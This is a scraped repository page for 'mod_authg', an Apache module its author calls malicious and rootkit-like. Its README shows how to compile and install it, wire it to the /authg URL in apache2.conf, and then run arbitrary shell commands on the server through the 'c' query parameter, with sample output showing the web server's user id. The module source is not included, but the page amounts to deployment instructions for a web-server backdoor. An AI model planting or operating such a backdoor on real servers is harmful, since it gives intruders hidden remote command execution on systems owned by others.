Skip to content
A malicious Apache module with rootkit functionality
C Makefile
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.


A malicious Apache module with rootkit functionality C. Papathanasiou 2015

Compile by running:

   $ apxs -c -i mod_authg.c

Then activate it in Apache's apache2.conf file for instance for the URL /authg in as follows:

    #   apache2.conf
    LoadModule authg_module modules/
    <Location /authg>
    SetHandler authg

Then after restarting Apache via

    $ apachectl restart

you immediately can request the URL /authg?c=cmd and watch for the output of this module. This can be achieved for instance via:

    $ lynx -mime_header http://localhost/authg?c=id 

The output should be similar to the following one:

     HTTP/1.1 200 OK
     Date: Thu, 19 Feb 2015 16:33:30 GMT
     Server: Apache/2.4.7 (Ubuntu)
     Content-Length: 54
     Connection: close
     Content-Type: text/html

     uid=33(www-data) gid=33(www-data) groups=33(www-data)

Created for demo purposes only, no liability accepted.

You can’t perform that action at this time.